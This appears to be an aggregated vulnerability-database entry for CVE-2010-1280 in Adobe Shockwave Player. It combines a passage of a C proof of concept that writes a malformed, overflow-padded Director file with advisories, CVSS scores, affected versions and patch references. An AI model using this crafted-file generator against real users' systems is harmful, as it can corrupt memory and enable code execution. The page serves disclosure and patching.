0x65, 0x54, 0x79, 0x70, 0x65, 0x04, 0x6F, 0x76, 0x61, 0x6C, 0x09, 0x72, 0x6F, 0x75, 0x6E, 0x64, 0x52, 0x65, 0x63, 0x74, 0x04, 0x6C, 0x69, 0x6E, 0x65, 0x08, 0x6C, 0x69, 0x6E, 0x65, 0x53, 0x69, 0x7A, 0x65, 0x0B, 0x67, 0x72, 0x61, 0x6E, 0x75, 0x6C, 0x61, 0x72, 0x69, 0x74, 0x79, 0x0D, 0x6C, 0x69, 0x6E, 0x65, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x69, 0x6F, 0x6E, 0x07, 0x70, 0x61, 0x74, 0x74, 0x65, 0x72, 0x6E, 0x00, 0x20, 0x6C, 0x63, 0x63, 0x00, 0x00, 0x00, 0x00, 0x70, 0x61, 0x6D, 0x46, 0x00, 0x00, 0x00, 0x00, 0x49, 0x46, 0x57, 0x56, 0xA8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00, 0x66, 0x09, 0x4E, 0x2F, 0x41, 0x20, 0x2D, 0x20, 0x4E, 0x2F, 0x41, 0x00, 0x09, 0x4E, 0x2F, 0x41, 0x20, 0x2D, 0x20, 0x4E, 0x2F, 0x41, 0x00, 0x4A, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x6C, 0x71, 0x77, 0x72, 0x6D, 0x5C, 0x44, 0x65, 0x73, 0x6B, 0x74, 0x6F, 0x70, 0x5C, 0x41, 0x44, 0x4F, 0x42, 0x45, 0x20, 0x44, 0x49, 0x52, 0x45, 0x43, 0x54, 0x4F, 0x52, 0x20, 0x57, 0x4F, 0x52, 0x4B, 0x49, 0x4E, 0x47, 0x20, 0x56, 0x55, 0x4C, 0x4E, 0x20, 0x46, 0x49, 0x4C, 0x45, 0x5A, 0x5C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x53, 0x57, 0x56, 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xF8, 0xFF, 0xFF, 0xFF, 0xFD, 0x00, 0x00, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8C, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0x94, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x0E, 0x00, 0x30, 0x03, 0xEE, 0x00, 0x96, 0x00, 0x36, 0x00, 0x30, 0x01, 0x20, 0x10, 0x80, 0x00, 0xFF, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x97, 0x00, 0x2E, 0x00, 0x87, 0x00, 0xA4, 0x30, 0x00, 0x02, 0x00, 0x00, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x01, 0x36, 0x82, 0x00, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x01, 0x00, 0x00, 0x00, 0x0F, 0xE1, 0xFD, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x43, 0x54, 0x57, 0x56, 0x00, 0x00, 0x00, 0x00, 0x42, 0x4C, 0x57, 0x56, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4C, 0x54, 0x57, 0x56, 0x00, 0x00, 0x00, 0x00, 0x6E, 0x61, 0x68, 0x43, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6D, 0x75, 0x68, 0x54, 0xC2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x24, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00, 0xF5, 0x00, 0xF5, 0xFF, 0xF5, 0x00, 0xF8, 0x00, 0xEF, 0xFF, 0xF8, 0x00, 0xFA, 0x00, 0xEB, 0xFF, 0xFA, 0x00, 0xFB, 0x00, 0xE9, 0xFF, 0xFB, 0x00, 0xFC, 0x00, 0xE7, 0xFF, 0xFC, 0x00, 0xFD, 0x00, 0xE5, 0xFF, 0xFD, 0x00, 0xFE, 0x00, 0xE3, 0xFF, 0xFE, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0xDE, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xDF, 0xFF, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0xE1, 0xFF, 0x01, 0x00, 0x00, 0xFE, 0x00, 0xE3, 0xFF, 0xFE, 0x00, 0xFD, 0x00, 0xE5, 0xFF, 0xFD, 0x00, 0xFC, 0x00, 0xE7, 0xFF, 0xFC, 0x00, 0xFB, 0x00, 0xE9, 0xFF, 0xFB, 0x00, 0xFA, 0x00, 0xEB, 0xFF, 0xFA, 0x00, 0xF8, 0x00, 0xEF, 0xFF, 0xF8, 0x00, 0xF5, 0x00, 0xF5, 0xFF, 0xF5, 0x00, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00, 0xDD, 0x00 //8756 }; int main(int argc, char *argv[]) { char buff[409008]; char junk[400001]; memset(junk,0x41,400001); memcpy(buff,shocks,strlen(shocks)); memcpy(buff+strlen(shocks),junk,strlen(junk)); memcpy(buff+strlen(shocks)+strlen(junk),shocke,strlen(shocke)); fp = fopen(FFORMAT,"wb"); if(fp==NULL) { perror ("\nUweeepa! Can't open file.\n"); } fwrite(buff,1,sizeof(buff),fp); fclose(fp); printf("\nFile %s successfully created!\n\a", FFORMAT); return 0; } . ---------------------------------------------------------------------- Looking for a job? Secunia is hiring skilled researchers and talented developers. 1) A boundary error while processing FFFFFF45h Shockwave 3D blocks can be exploited to corrupt memory. 2) A signedness error in the processing of Director files can be exploited to corrupt memory. 3) An array indexing error when processing Director files can be exploited to corrupt memory. 4) An integer overflow error when processing Director files can be exploited to corrupt memory. 5) An error when processing asset entries contained in Director files can be exploited to corrupt memory. 6) A boundary error when processing embedded fonts can be exploited to cause a heap-based buffer overflow via a specially crafted Director file. 7) An error when processing Director files can be exploited to overwrite 4 bytes of memory. 8) An error in the implementation of ordinal function 1409 in iml32.dll can be exploited to corrupt heap memory via a specially crafted Director file. 9) An error when processing a 4-byte field inside FFFFFF49h Shockwave 3D blocks can be exploited to corrupt heap memory. 10) An unspecified error can be exploited to corrupt memory. 11) A second unspecified error can be exploited to corrupt memory. 12) A third unspecified error can be exploited to corrupt memory. 13) A fourth unspecified error can be exploited to cause a buffer overflow. 14) A fifth unspecified error can be exploited to corrupt memory. 15) A sixth unspecified error can be exploited to corrupt memory. 16) A seventh unspecified error can be exploited to corrupt memory. 17) An error when processing signed values encountered while parsing "pami" RIFF chunks can be exploited to corrupt memory. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. SOLUTION: Update to version 11.5.7.609. http://get.adobe.com/shockwave/ PROVIDED AND/OR DISCOVERED BY: 1-6) Alin Rad Pop, Secunia Research The vendor also credits: 2) Nahuel Riva of Core Security Technologies. 3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person working with iDefense. 7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs, Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's FortiGuard Labs. 8, 17) an anonymous person working with ZDI. 9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI. 10) Chaouki Bekrar of Vupen. 11-16) Chro HD of Fortinet's FortiGuard Labs. CHANGELOG: 2010-05-12: Updated "Extended Description" and added PoCs for vulnerabilities #2, #3, #4, and #6. ORIGINAL ADVISORY: Adobe: http://www.adobe.com/support/security/bulletins/apsb10-12.html Secunia Research: http://secunia.com/secunia_research/2010-17/ http://secunia.com/secunia_research/2010-19/ http://secunia.com/secunia_research/2010-20/ http://secunia.com/secunia_research/2010-22/ http://secunia.com/secunia_research/2010-34/ http://secunia.com/secunia_research/2010-50/ ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-087/ http://www.zerodayinitiative.com/advisories/ZDI-10-088/ http://www.zerodayinitiative.com/advisories/ZDI-10-089/ iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869 Code Audit Labs: http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html Zero Science Lab: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php Core Security Technologies: http://www.coresecurity.com/content/adobe-director-invalid-read ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . User interaction is required in that a user must visit a malicious web site. When a malicious value is used during a memory dereference a possible 4-byte memory overwrite may occur. Exploitation can lead to remote system compromise under the credentials of the currently logged in user. About Code Audit Labs: ===================== Code Audit Labs is department of VulnHunt company which provide a professional security testing products / services / security consulting and training ,we sincerely hope we can help your procudes to improve code quality and safety. WebSite http://www.VulnHunt.com ( online soon) . These vulnerabilities are caused due to memory corruptions, array indexing, heap overflows and invalid pointers when processing malformed files, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page. III. Binary Analysis & Proof-of-concept --------------------------------------- In-depth binary analysis, code execution exploits and proof-of-concept codes are published through the VUPEN Binary Analysis & Exploits Service : http://www.vupen.com/exploits/ V. CREDIT -------------- Discovered by Chaouki Bekrar and Sebastien Renaud of VUPEN Security VII. ABOUT VUPEN Security --------------------------- VUPEN is a leading IT security research company providing vulnerability management and security intelligence solutions which enable enterprises and institutions to eliminate vulnerabilities before they can be exploited, ensure security policy compliance and meaningfully measure and manage risks. Governmental and federal agencies, and global enterprises in the financial services, insurance, manufacturing and technology industries rely on VUPEN to improve their security, prioritize resources, cut time and costs, and stay ahead of the latest threats. * VUPEN Vulnerability Notification Service: http://www.vupen.com/english/services/ * VUPEN Binary Analysis & Exploits Service : http://www.vupen.com/exploits/ * VUPEN Web Application Security Scanner (WASS): http://www.vupen.com/english/wass/ VIII. REFERENCES ---------------------- http://www.vupen.com/english/advisories/2010/1128 http://www.adobe.com/support/security/bulletins/apsb10-12.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1280 IX. DISCLOSURE TIMELINE ----------------------------- 2010-02-24 - Vendor notified 2010-02-24 - Vendor response 2010-03-02 - Status update received 2010-05-07 - Status update received 2010-05-12 - Coordinated public Disclosure

Trust: 2.43

sources: NVD: CVE-2010-1280 // JVNDB: JVNDB-2010-001479 // BID: 40081 // ZSL: ZSL-2010-4937 // VULHUB: VHN-43885 // PACKETSTORM: 89427 // PACKETSTORM: 89462 // PACKETSTORM: 89432 // PACKETSTORM: 89492

AFFECTED PRODUCTS

vendor:adobemodel:shockwave playerscope:ltversion:11.5.7.609

Trust: 1.0

vendor:adobemodel:shockwave playerscope:lteversion:11.5.6.606

Trust: 0.8

vendor:adobemodel:shockwave playerscope:eqversion:10.1.0.11

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:6.0

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:2.0

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:4.0

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:8.5.1

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:8.0

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:3.0

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:5.0

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:9

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:1.0

Trust: 0.6

vendor:adobemodel:shockwave playerscope:eqversion:11.5.6.606

Trust: 0.3

vendor:adobemodel:shockwave playerscope:eqversion:11.5.2.606

Trust: 0.3

vendor:adobemodel:shockwave playerscope:eqversion:11.5.2.602

Trust: 0.3

vendor:adobemodel:shockwave playerscope:eqversion:11.5.1.601

Trust: 0.3

vendor:adobemodel:shockwave playerscope:eqversion:11.5.601

Trust: 0.3

vendor:adobemodel:shockwave playerscope:eqversion:11.5.600

Trust: 0.3

vendor:adobemodel:shockwave playerscope:eqversion:11.5.596

Trust: 0.3

vendor:adobemodel:shockwave playerscope:neversion:11.5.7.609

Trust: 0.3

vendor:adobe incorporatedmodel:shockwave playerscope:eqversion:11.5.6.606

Trust: 0.1

sources: ZSL: ZSL-2010-4937 // BID: 40081 // JVNDB: JVNDB-2010-001479 // CNNVD: CNNVD-201005-195 // NVD: CVE-2010-1280

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2010-1280
value: HIGH

Trust: 1.0

NVD: CVE-2010-1280
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201005-195
value: HIGH

Trust: 0.6

ZSL: ZSL-2010-4937
value: (4/5)

Trust: 0.1

VULHUB: VHN-43885
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2010-1280
severity: HIGH
baseScore: 9.3
vectorString: AV:N/AC:M/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.6
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-43885
severity: HIGH
baseScore: 9.3
vectorString: AV:N/AC:M/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 8.6
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2010-1280
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.1

Trust: 1.0

sources: ZSL: ZSL-2010-4937 // VULHUB: VHN-43885 // JVNDB: JVNDB-2010-001479 // CNNVD: CNNVD-201005-195 // NVD: CVE-2010-1280

PROBLEMTYPE DATA

problemtype:CWE-787

Trust: 1.0

problemtype:CWE-119

Trust: 0.9

sources: VULHUB: VHN-43885 // JVNDB: JVNDB-2010-001479 // NVD: CVE-2010-1280

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 89432 // CNNVD: CNNVD-201005-195

TYPE

buffer error

Trust: 0.6

sources: CNNVD: CNNVD-201005-195

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2010-001479

EXPLOIT AVAILABILITY
sources:
            
            
            ZSL: ZSL-2010-4937 // 
            
            
            
            VULHUB: VHN-43885

PATCH
title:APSB10-12url:http://www.adobe.com/support/security/bulletins/apsb10-12.html
Trust: 0.8
title:APSB10-12url:http://www.adobe.com/jp/support/security/bulletins/apsb10-12.html
Trust: 0.8
title:Shockwave 11.5.7.609 for Mac Slimurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=3595
Trust: 0.6
title:Adobe Shockwave Player version 11.5.7.609url:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=3594
Trust: 0.6
title:Adobe Shockwave Player version 11.5.7.609url:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=4082
Trust: 0.6
title:Adobe Shockwave Player version 11.5.7.609url:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=4081
Trust: 0.6
title:Adobe Shockwave Player version 11.5.7.609url:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=4080
Trust: 0.6
sources:
            
            
            JVNDB: JVNDB-2010-001479 // 
            
            
            
            CNNVD: CNNVD-201005-195

EXTERNAL IDS
db:NVDid:CVE-2010-1280
Trust: 3.1
db:SECUNIAid:38751
Trust: 2.9
db:VUPENid:ADV-2010-1128
Trust: 2.7
db:ZSLid:ZSL-2010-4937
Trust: 2.1
db:JVNDBid:JVNDB-2010-001479
Trust: 0.8
db:CNNVDid:CNNVD-201005-195
Trust: 0.7
db:BIDid:40081
Trust: 0.5
db:EXPLOIT-DBid:12578
Trust: 0.2
db:PACKETSTORMid:89432
Trust: 0.2
db:PACKETSTORMid:89492
Trust: 0.2
db:PACKETSTORMid:89427
Trust: 0.2
db:XFid:58447
Trust: 0.1
db:OSVDBid:64646
Trust: 0.1
db:AUSCERTid:ESB-2010.0436
Trust: 0.1
db:SECTRACKid:1023980
Trust: 0.1
db:VULHUBid:VHN-43885
Trust: 0.1
db:ZDIid:ZDI-10-087
Trust: 0.1
db:ZDIid:ZDI-10-089
Trust: 0.1
db:ZDIid:ZDI-10-088
Trust: 0.1
db:PACKETSTORMid:89462
Trust: 0.1
sources:
            
            
            ZSL: ZSL-2010-4937 // 
            
            
            
            VULHUB: VHN-43885 // 
            
            
            
            BID: 40081 // 
            
            
            
            JVNDB: JVNDB-2010-001479 // 
            
            
            
            PACKETSTORM: 89427 // 
            
            
            
            PACKETSTORM: 89462 // 
            
            
            
            PACKETSTORM: 89432 // 
            
            
            
            PACKETSTORM: 89492 // 
            
            
            
            CNNVD: CNNVD-201005-195 // 
            
            
            
            NVD: CVE-2010-1280

REFERENCES
url:http://www.vupen.com/english/advisories/2010/1128
Trust: 2.7
url:http://www.adobe.com/support/security/bulletins/apsb10-12.html
Trust: 2.5
url:http://secunia.com/advisories/38751
Trust: 2.5
url:http://www.zeroscience.mk/en/vulnerabilities/zsl-2010-4937.php
Trust: 1.9
url:http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Trust: 1.8
url:http://www.securityfocus.com/archive/1/511257/100/0/threaded
Trust: 1.7
url:http://www.zeroscience.mk/codes/shockwave_mem.txt
Trust: 1.7
url:https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a7184
Trust: 1.7
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1280
Trust: 0.9
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-1280
Trust: 0.8
url:http://www.adobe.com/products/shockwaveplayer/
Trust: 0.3
url:/archive/1/511257
Trust: 0.3
url:https://nvd.nist.gov/vuln/detail/cve-2010-1280
Trust: 0.3
url:http://secunia.com/advisories/38751/
Trust: 0.2
url:http://www.vulnhunt.com
Trust: 0.2
url:http://packetstormsecurity.org/filedesc/zsl-2010-4937.txt.html
Trust: 0.1
url:http://www.qualys.com/research/alerts/view.php/2010-05-11-2
Trust: 0.1
url:http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1280
Trust: 0.1
url:http://www.exploit-db.com/exploits/12578
Trust: 0.1
url:http://www.securityfocus.com/bid/40081
Trust: 0.1
url:http://www.0daynet.com/2010/0512/335.html
Trust: 0.1
url:http://securityreason.com/exploitalert/8249
Trust: 0.1
url:http://forums.cnet.com/5208-6132_102-0.html?messageid=3303052
Trust: 0.1
url:http://news.dreamings.org/?p=1050
Trust: 0.1
url:http://securitytracker.com/alerts/2010/may/1023980.html
Trust: 0.1
url:http://www.auscert.org.au/render.html?it=12789
Trust: 0.1
url:http://securityvulns.ru/xdocument830.html
Trust: 0.1
url:http://xforce.iss.net/xforce/xfdb/58447
Trust: 0.1
url:http://osvdb.org/show/osvdb/64646
Trust: 0.1
url:http://www.nessus.org/plugins/index.php?view=single&amp;id=46329
Trust: 0.1
url:http://www.zeroscience.mk
Trust: 0.1
url:http://www.adobe.com
Trust: 0.1
url:http://secunia.com/secunia_research/2010-19/
Trust: 0.1
url:http://www.zerodayinitiative.com/advisories/zdi-10-089/
Trust: 0.1
url:http://secunia.com/company/jobs/
Trust: 0.1
url:http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
Trust: 0.1
url:http://secunia.com/secunia_research/2010-17/
Trust: 0.1
url:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Trust: 0.1
url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Trust: 0.1
url:http://www.zerodayinitiative.com/advisories/zdi-10-087/
Trust: 0.1
url:http://secunia.com/advisories/about_secunia_advisories/
Trust: 0.1
url:http://secunia.com/secunia_research/2010-34/
Trust: 0.1
url:http://secunia.com/advisories/secunia_security_advisories/
Trust: 0.1
url:http://www.zerodayinitiative.com/advisories/zdi-10-088/
Trust: 0.1
url:http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
Trust: 0.1
url:http://secunia.com/secunia_research/2010-22/
Trust: 0.1
url:http://secunia.com/secunia_research/2010-50/
Trust: 0.1
url:http://get.adobe.com/shockwave/
Trust: 0.1
url:http://www.coresecurity.com/content/adobe-director-invalid-read
Trust: 0.1
url:http://secunia.com/secunia_research/2010-20/
Trust: 0.1
url:http://www.vupen.com/english/wass/
Trust: 0.1
url:http://www.vupen.com/english/research.php
Trust: 0.1
url:http://www.vupen.com/english/services/
Trust: 0.1
url:http://www.vupen.com/exploits/
Trust: 0.1
sources:
            
            
            ZSL: ZSL-2010-4937 // 
            
            
            
            VULHUB: VHN-43885 // 
            
            
            
            BID: 40081 // 
            
            
            
            JVNDB: JVNDB-2010-001479 // 
            
            
            
            PACKETSTORM: 89427 // 
            
            
            
            PACKETSTORM: 89462 // 
            
            
            
            PACKETSTORM: 89432 // 
            
            
            
            PACKETSTORM: 89492 // 
            
            
            
            CNNVD: CNNVD-201005-195 // 
            
            
            
            NVD: CVE-2010-1280

CREDITS
Gjoko 'LiquidWorm' Krstic
Trust: 0.9
sources:
            
            
            BID: 40081 // 
            
            
            
            CNNVD: CNNVD-201005-195

SOURCES
db:ZSLid:ZSL-2010-4937
db:VULHUBid:VHN-43885
db:BIDid:40081
db:JVNDBid:JVNDB-2010-001479
db:PACKETSTORMid:89427
db:PACKETSTORMid:89462
db:PACKETSTORMid:89432
db:PACKETSTORMid:89492
db:CNNVDid:CNNVD-201005-195
db:NVDid:CVE-2010-1280

LAST UPDATE DATE
2024-11-23T21:47:30.357000+00:00

SOURCES UPDATE DATE
db:ZSLid:ZSL-2010-4937date:2011-03-06T00:00:00
db:VULHUBid:VHN-43885date:2018-10-10T00:00:00
db:BIDid:40081date:2010-05-12T17:22:00
db:JVNDBid:JVNDB-2010-001479date:2010-05-31T00:00:00
db:CNNVDid:CNNVD-201005-195date:2022-09-19T00:00:00
db:NVDid:CVE-2010-1280date:2024-11-21T01:14:02.530

SOURCES RELEASE DATE
db:ZSLid:ZSL-2010-4937date:2010-05-11T00:00:00
db:VULHUBid:VHN-43885date:2010-05-13T00:00:00
db:BIDid:40081date:2010-05-11T00:00:00
db:JVNDBid:JVNDB-2010-001479date:2010-05-31T00:00:00
db:PACKETSTORMid:89427date:2010-05-12T02:53:20
db:PACKETSTORMid:89462date:2010-05-13T07:29:48
db:PACKETSTORMid:89432date:2010-05-12T03:01:00
db:PACKETSTORMid:89492date:2010-05-14T14:52:15
db:CNNVDid:CNNVD-201005-195date:2010-05-13T00:00:00
db:NVDid:CVE-2010-1280date:2010-05-13T17:30:02